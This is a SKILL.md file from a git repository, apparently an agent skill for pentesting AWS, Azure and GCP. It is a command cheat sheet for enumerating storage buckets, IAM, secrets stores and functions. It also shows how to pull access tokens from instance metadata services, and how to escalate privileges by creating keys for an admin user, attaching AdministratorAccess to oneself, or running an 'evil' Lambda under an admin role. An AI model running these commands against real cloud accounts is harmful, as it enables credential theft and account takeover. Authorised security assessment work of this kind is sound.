zhongwei/gh-trilwu-secskills-secskills
1
0
Fork 0
Code Issues Pull Requests Actions Packages Projects Releases Wiki Activity
Files
master
gh-trilwu-secskills-secskills/skills/cloud-security/SKILL.md
Zhongwei Li 33a29e697a Initial commit
2025-11-30 09:03:09 +08:00

11 KiB
Raw Permalink Blame History

name, description
name description
exploiting-cloud-platforms Exploit AWS, Azure, and GCP cloud misconfigurations including S3 buckets, IAM roles, metadata services, serverless functions, and cloud-specific privilege escalation. Use when pentesting cloud environments or assessing cloud security.

Exploiting Cloud Platforms

When to Use

  • AWS, Azure, or GCP security assessment
  • Cloud misconfiguration exploitation
  • S3/Blob/Storage bucket hunting
  • Cloud IAM privilege escalation
  • Serverless function exploitation
  • Cloud metadata service abuse

AWS Security

AWS CLI Setup

# Configure credentials
aws configure
# Or export directly
export AWS_ACCESS_KEY_ID=AKIAIOSFODNN7EXAMPLE
export AWS_SECRET_ACCESS_KEY=wJalrXUtnFEMI/K7MDENG/bPxRfiCYEXAMPLEKEY
export AWS_DEFAULT_REGION=us-east-1

# Test credentials
aws sts get-caller-identity

# List available regions
aws ec2 describe-regions

S3 Bucket Enumeration

# List buckets
aws s3 ls

# List bucket contents
aws s3 ls s3://bucket-name/
aws s3 ls s3://bucket-name/ --recursive

# Download bucket contents
aws s3 sync s3://bucket-name/ ./local-folder/

# Check public access
aws s3api get-bucket-acl --bucket bucket-name
aws s3api get-bucket-policy --bucket bucket-name

# Test unauthenticated access
aws s3 ls s3://bucket-name/ --no-sign-request
curl https://bucket-name.s3.amazonaws.com/

S3 Bucket Discovery:

# Common naming patterns
company-backup
company-data
company-dev
company-prod
company-logs
company-assets

# Tools
# s3scanner
python3 s3scanner.py buckets.txt

# S3 Inspector
python3 s3inspector.py --bucket-file buckets.txt

IAM Enumeration

# Current user info
aws sts get-caller-identity

# List IAM users (if allowed)
aws iam list-users

# List user policies
aws iam list-attached-user-policies --user-name username
aws iam list-user-policies --user-name username

# Get policy details
aws iam get-policy --policy-arn arn:aws:iam::aws:policy/PolicyName
aws iam get-policy-version --policy-arn arn --version-id v1

# List roles
aws iam list-roles

# List groups
aws iam list-groups

EC2 Enumeration

# List instances
aws ec2 describe-instances

# Get instance metadata (from instance)
curl http://169.254.169.254/latest/meta-data/
curl http://169.254.169.254/latest/meta-data/iam/security-credentials/
curl http://169.254.169.254/latest/meta-data/iam/security-credentials/role-name

# List security groups
aws ec2 describe-security-groups

# List key pairs
aws ec2 describe-key-pairs

# List snapshots
aws ec2 describe-snapshots --owner-ids self

# Public snapshots by account
aws ec2 describe-snapshots --owner-ids 123456789012 --restorable-by-user-ids all

Lambda Functions

# List functions
aws lambda list-functions

# Get function code
aws lambda get-function --function-name function-name

# Invoke function
aws lambda invoke --function-name function-name output.txt

# Get function configuration
aws lambda get-function-configuration --function-name function-name

RDS Enumeration

# List DB instances
aws rds describe-db-instances

# List DB snapshots
aws rds describe-db-snapshots

# Check if publicly accessible
aws rds describe-db-instances --query 'DBInstances[*].[DBInstanceIdentifier,PubliclyAccessible]'

Secrets Manager

# List secrets
aws secretsmanager list-secrets

# Get secret value
aws secretsmanager get-secret-value --secret-id secret-name

CloudTrail (Logging)

# Check if CloudTrail is enabled
aws cloudtrail describe-trails

# Check trail status
aws cloudtrail get-trail-status --name trail-name

# Get recent events
aws cloudtrail lookup-events

AWS Privilege Escalation

Common Misconfigurations:

# iam:CreatePolicyVersion - modify existing policies
# iam:SetDefaultPolicyVersion - set older policy version
# iam:PassRole + lambda:CreateFunction - execute code as role
# iam:AttachUserPolicy - attach admin policy to self
# iam:PutUserPolicy - add inline policy to self
# iam:CreateAccessKey - create keys for other users
# iam:UpdateAssumeRolePolicy - modify trust relationships

Exploitation Examples:

# Create access key for admin user (if iam:CreateAccessKey)
aws iam create-access-key --user-name admin-user

# Attach admin policy (if iam:AttachUserPolicy)
aws iam attach-user-policy --user-name current-user --policy-arn arn:aws:iam::aws:policy/AdministratorAccess

# PassRole + Lambda
aws lambda create-function --function-name evil --runtime python3.9 --role arn:aws:iam::ACCOUNT:role/AdminRole --handler lambda_function.lambda_handler --zip-file fileb://function.zip
aws lambda invoke --function-name evil output.txt

Azure Security

Azure CLI Setup

# Login
az login

# Login with service principal
az login --service-principal -u APP_ID -p PASSWORD --tenant TENANT_ID

# Get current account
az account show

# List subscriptions
az account list

Blob Storage Enumeration

# List storage accounts
az storage account list

# List containers
az storage container list --account-name accountname

# List blobs
az storage blob list --container-name containername --account-name accountname

# Download blob
az storage blob download --container-name containername --name filename --account-name accountname

# Check public access
az storage container show --name containername --account-name accountname

# Test unauthenticated access
curl https://accountname.blob.core.windows.net/container/file

Blob Discovery:

# Common patterns
companyname
companyname-backup
companyname-data
companyname-files

# MicroBurst (PowerShell)
Invoke-EnumerateAzureBlobs -Base company

VM Enumeration

# List VMs
az vm list

# List VM images
az vm image list

# Get VM details
az vm show --resource-group RG --name VMname

# List NICs
az network nic list

# List public IPs
az network public-ip list

Azure AD Enumeration

# List users
az ad user list

# Get current user
az ad signed-in-user show

# List groups
az ad group list

# List service principals
az ad sp list

# List applications
az ad app list

Function Apps

# List function apps
az functionapp list

# Get function app details
az functionapp show --name functionappname --resource-group RG

# List functions
az functionapp function list --name functionappname --resource-group RG

# Download function code
az functionapp deployment source config-zip --name functionappname --resource-group RG

Key Vault

# List key vaults
az keyvault list

# List secrets
az keyvault secret list --vault-name vaultname

# Get secret
az keyvault secret show --name secretname --vault-name vaultname

Azure Metadata Service

# From Azure VM
curl -H Metadata:true "http://169.254.169.254/metadata/instance?api-version=2021-02-01"

# Get access token
curl -H Metadata:true "http://169.254.169.254/metadata/identity/oauth2/token?api-version=2018-02-01&resource=https://management.azure.com/"

GCP Security

gcloud Setup

# Login
gcloud auth login

# Login with service account
gcloud auth activate-service-account --key-file=key.json

# Get current account
gcloud config list

# List projects
gcloud projects list

Storage Bucket Enumeration

# List buckets
gsutil ls

# List bucket contents
gsutil ls gs://bucket-name/

# Download files
gsutil cp gs://bucket-name/file.txt ./

# Check bucket permissions
gsutil iam get gs://bucket-name/

# Test unauthenticated access
curl https://storage.googleapis.com/bucket-name/file.txt

Bucket Discovery:

# Common patterns
company-backup
company-data
company_backup
company_data

# GCPBucketBrute
python3 gcpbucketbrute.py -k company

Compute Engine

# List instances
gcloud compute instances list

# Get instance details
gcloud compute instances describe instance-name --zone=zone

# List disks
gcloud compute disks list

# List snapshots
gcloud compute snapshots list

# List firewall rules
gcloud compute firewall-rules list

IAM Enumeration

# List service accounts
gcloud iam service-accounts list

# Get IAM policy
gcloud projects get-iam-policy PROJECT_ID

# List roles
gcloud iam roles list

# Describe role
gcloud iam roles describe roles/editor

Cloud Functions

# List functions
gcloud functions list

# Describe function
gcloud functions describe function-name --region=region

# Download source code (if accessible)
gcloud functions describe function-name --region=region --format="value(sourceArchiveUrl)"

GCP Metadata Service

# From GCP VM
curl "http://metadata.google.internal/computeMetadata/v1/?recursive=true" -H "Metadata-Flavor: Google"

# Get access token
curl "http://metadata.google.internal/computeMetadata/v1/instance/service-accounts/default/token" -H "Metadata-Flavor: Google"

# Get service account email
curl "http://metadata.google.internal/computeMetadata/v1/instance/service-accounts/default/email" -H "Metadata-Flavor: Google"

Cloud Exploitation Tools

AWS:

# Pacu - AWS exploitation framework
python3 pacu.py

# ScoutSuite - Security auditing
python3 scout.py aws

# Prowler - Security assessment
./prowler -M csv

# WeirdAAL - AWS attack library
python3 weirdAAL.py

Azure:

# MicroBurst - PowerShell toolkit
Import-Module MicroBurst.psm1
Invoke-EnumerateAzureBlobs
Invoke-EnumerateAzureSubDomains

# ScoutSuite
python3 scout.py azure

# ROADtools - Azure AD
roadrecon auth
roadrecon gather
roadrecon gui

GCP:

# ScoutSuite
python3 scout.py gcp

# GCP-IAM-Privilege-Escalation
# Check for privilege escalation paths

Quick Cloud Wins

AWS:

  • Public S3 buckets with sensitive data
  • Overly permissive IAM policies
  • Unencrypted snapshots
  • Public RDS instances
  • Lambda functions with secrets in environment variables
  • EC2 metadata service abuse (SSRF)

Azure:

  • Public blob storage containers
  • Overly permissive RBAC
  • Exposed Key Vault secrets
  • Public-facing VMs with weak credentials
  • Function apps with hardcoded secrets

GCP:

  • Public storage buckets
  • Overly permissive IAM bindings
  • Public compute instances
  • Service account key exposure
  • Cloud Functions with secrets in code

Common Cloud Misconfigurations

  1. Public Storage - S3/Blob/GCS buckets with public read/write
  2. Excessive Permissions - Overly permissive IAM/RBAC policies
  3. Exposed Secrets - Keys/passwords in code, environment variables
  4. No MFA - Critical accounts without multi-factor authentication
  5. Open Security Groups - 0.0.0.0/0 access on sensitive ports
  6. Unencrypted Data - Storage/databases without encryption
  7. Default Credentials - Services using default passwords
  8. Exposed Metadata - SSRF to cloud metadata services
  9. Public Snapshots - EBS/disk snapshots publicly accessible
  10. CloudTrail Disabled - No logging of API calls

References

Reference in New Issue View Git Blame Copy Permalink